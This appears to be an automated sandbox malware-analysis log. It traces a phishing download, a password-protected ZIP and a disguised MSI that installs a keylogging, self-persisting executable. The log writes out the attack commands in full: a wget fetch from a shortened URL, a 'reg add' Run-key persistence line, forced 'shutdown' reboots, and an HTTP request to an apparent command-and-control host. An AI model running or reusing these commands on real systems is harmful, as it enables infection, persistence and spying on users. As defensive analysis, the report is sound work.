Source: 7za.exe, 00000008.00000003.300985145.0000000000830000.00000004.00000800.00020000.00000000.sdmp, MSI77A4.tmp.15.dr, MSI6D3F.tmp.15.dr, MSI6BA7.tmp.15.dr, 45a20c.msi.15.dr, MSI6CB1.tmp.15.dr, MSI6B19.tmp.15.dr, MSI795E.tmp.15.dr, MSI71C6.tmp.15.dr, MSI7129.tmp.15.dr, MSI76D8.tmp.15.dr, MSI6DAD.tmp.15.dr, M Contrato UK .msi.8.drString found in binary or memory: https://www.digicert.com/CPS0
Source: 7za.exe, 00000008.00000003.300985145.0000000000830000.00000004.00000800.00020000.00000000.sdmp, MSI77A4.tmp.15.dr, MSI6D3F.tmp.15.dr, MSI6BA7.tmp.15.dr, 45a20c.msi.15.dr, MSI6CB1.tmp.15.dr, MSI6B19.tmp.15.dr, MSI795E.tmp.15.dr, MSI71C6.tmp.15.dr, MSI7129.tmp.15.dr, MSI76D8.tmp.15.dr, MSI6DAD.tmp.15.dr, M Contrato UK .msi.8.drString found in binary or memory: https://www.thawte.com/cps0/
Source: 7za.exe, 00000008.00000003.300985145.0000000000830000.00000004.00000800.00020000.00000000.sdmp, MSI77A4.tmp.15.dr, MSI6D3F.tmp.15.dr, MSI6BA7.tmp.15.dr, 45a20c.msi.15.dr, MSI6CB1.tmp.15.dr, MSI6B19.tmp.15.dr, MSI795E.tmp.15.dr, MSI71C6.tmp.15.dr, MSI7129.tmp.15.dr, MSI76D8.tmp.15.dr, MSI6DAD.tmp.15.dr, M Contrato UK .msi.8.drString found in binary or memory: https://www.thawte.com/repository0W
Source: unknownHTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg
Source: unknownDNS traffic detected: queries for: tinyurl.com
Source: global trafficHTTP traffic detected: GET /2abosd8k HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoAccept: */*Accept-Encoding: identityHost: tinyurl.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /V9Hh?24774833624 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoAccept: */*Accept-Encoding: identityHost: empresas01.page.linkConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /empresa01.html HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoAccept: */*Accept-Encoding: identityHost: contratoempresarial.s3.ir-tbz-sh1.arvanstorage.irConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-104.0.5112.81Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/jquery/3.6.0/jquery.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/jszip-utils/0.1.0/jszip-utils.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/jszip/3.6.0/jszip.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/FileSaver.js/2.0.5/FileSaver.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /3oDy7mm HTTP/1.1Host: bit.lyConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /file/img001/LwwKUVJ1RTKn0DIWa1bTlw.png HTTP/1.1Host: img001.prntscr.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /flevix.com/wp-content/uploads/2019/07/Focus-Loading-1.gif HTTP/1.1Host: i1.wp.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /3oDy7mm HTTP/1.1Host: bit.lyConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /Alienware/index.php HTTP/1.1User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36"Host: mondialarqcondicetchat.comConnection: Keep-Alive
Source: unknownHTTPS traffic detected: 172.67.1.225:443 -> 192.168.2.3:49696 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.217.168.65:443 -> 192.168.2.3:49697 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.143.234.120:443 -> 192.168.2.3:49698 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: libpython3.8.dll.17.dr, _hHook/Ganchodireita.cs.Net Code: SetHook
Source: 32.2.openshot-qt.exe.2730000.1.unpack, _hHook/Ganchodireita.cs.Net Code: SetHook
Source: 32.2.openshot-qt.exe.6a100000.2.unpack, _hHook/Ganchodireita.cs.Net Code: SetHook
Source: 33.2.openshot-qt.exe.6a100000.2.unpack, _hHook/Ganchodireita.cs.Net Code: SetHook
Source: 33.2.openshot-qt.exe.3370000.1.unpack, _hHook/Ganchodireita.cs.Net Code: SetHook
Source: unarchiver.exe, 00000007.00000002.445662470.0000000000A4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

barindex
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -f -t 60
Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI6B19.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\45a20c.msiJump to behavior
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeCode function: 32_2_00305C7032_2_00305C70
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeCode function: 32_2_003048C032_2_003048C0
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeCode function: 32_2_06FD0AFC32_2_06FD0AFC
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeCode function: 32_2_06FD07E832_2_06FD07E8
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeCode function: 32_2_06FD3D1132_2_06FD3D11
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeCode function: 32_2_06FD8A9032_2_06FD8A90
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeCode function: 32_2_06FD204832_2_06FD2048
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeCode function: 33_2_031F06A033_2_031F06A0
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeCode function: 33_2_031F069233_2_031F0692
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeCode function: 33_2_031FAB5133_2_031FAB51
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeCode function: 33_2_031FAB6033_2_031FAB60
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeCode function: 33_2_031FF2D833_2_031FF2D8
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeCode function: 33_2_031FF2CA33_2_031FF2CA
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeCode function: String function: 031F8018 appears 84 times
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v tqVXfZhGNW /t reg_sz /d """"C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exe"""
Source: C:\Windows\SysWOW64\wget.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://tinyurl.com/2abosd8k" > cmdline.out 2>&1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://tinyurl.com/2abosd8k"
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\download\empresa01.html
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1764 --field-trial-handle=1816,i,4260702216927358363,7023541832913782999,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\SysWOW64\unarchiver.exe C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\Or amento - Pedido segunda-feira, 24 de abril de 2023F1nKhTNeGq3kSwMtzuiK.zip
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\mzgml0ot.pkx" "C:\Users\user\Downloads\Or amento - Pedido segunda-feira, 24 de abril de 2023F1nKhTNeGq3kSwMtzuiK.zip
Source: C:\Windows\SysWOW64\7za.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C "C:\Users\user\AppData\Local\Temp\mzgml0ot.pkx\M Contrato UK .msi
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\mzgml0ot.pkx\M Contrato UK .msi"
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 497B8A54F042C624761329931378FB15
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /C start /MIN reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v tqVXfZhGNW /t reg_sz /d """"C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exe""
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v tqVXfZhGNW /t reg_sz /d """"C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exe"""
Source: C:\Windows\SysWOW64\reg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C shutdown -r -f -t 60
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -f -t 60
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c shutdown /r /t 1 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown /r /t 1 /f
Source: unknownProcess created: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exe "C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exe"
Source: unknownProcess created: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exe "C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://tinyurl.com/2abosd8k" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1764 --field-trial-handle=1816,i,4260702216927358363,7023541832913782999,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v tqVXfZhGNW /t reg_sz /d """"C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exe"""Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C shutdown -r -f -t 60Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\SysWOW64\unarchiver.exe C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\Or amento - Pedido segunda-feira, 24 de abril de 2023F1nKhTNeGq3kSwMtzuiK.zipJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\mzgml0ot.pkx" "C:\Users\user\Downloads\Or amento - Pedido segunda-feira, 24 de abril de 2023F1nKhTNeGq3kSwMtzuiK.zipJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C "C:\Users\user\AppData\Local\Temp\mzgml0ot.pkx\M Contrato UK .msiJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\mzgml0ot.pkx\M Contrato UK .msi" Jump to behavior
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 497B8A54F042C624761329931378FB15Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /C start /MIN reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v tqVXfZhGNW /t reg_sz /d """"C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exe""Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C shutdown -r -f -t 60Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c shutdown /r /t 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v tqVXfZhGNW /t reg_sz /d """"C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exe"""Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -f -t 60Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown /r /t 1 /fJump to behavior
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Desktop\cmdline.outJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeFile created: C:\Users\user\AppData\Local\Temp\unarchiver.logJump to behavior
Source: shi5809.tmp.17.drBinary string: o\Device\NameResTrk\RecordNrtCloneOpenPacketW
Source: classification engineClassification label: mal64.rans.spyw.evad.win@60/48@12/14
Source: C:\Windows\SysWOW64\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: libpython3.8.dll.17.dr, Curativo/Coracao.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 32.2.openshot-qt.exe.2730000.1.unpack, Curativo/Coracao.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 32.2.openshot-qt.exe.6a100000.2.unpack, Curativo/Coracao.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 33.2.openshot-qt.exe.6a100000.2.unpack, Curativo/Coracao.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 33.2.openshot-qt.exe.3370000.1.unpack, Curativo/Coracao.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3808:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6952:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8172:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7296:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7060:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3536:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7844:120:WilError_01
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\GoogleUpdaterJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile written: C:\Users\user\AppData\Local\AdvinstAnalytics\64484aa77f91fb11699f00b9\10.20.15.27\tracking.iniJump to behavior
Source: C:\Windows\SysWOW64\wget.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\wget.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\unarchiver.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdaterJump to behavior
Source: Binary string: wininet.pdb source: shi5809.tmp.17.dr
Source: Binary string: C:\JobRelease\win\Release\bin\x86\embeddeduiproxy.pdb source: 7za.exe, 00000008.00000003.300985145.0000000000830000.00000004.00000800.00020000.00000000.sdmp, 45a20c.msi.15.dr, M Contrato UK .msi.8.dr
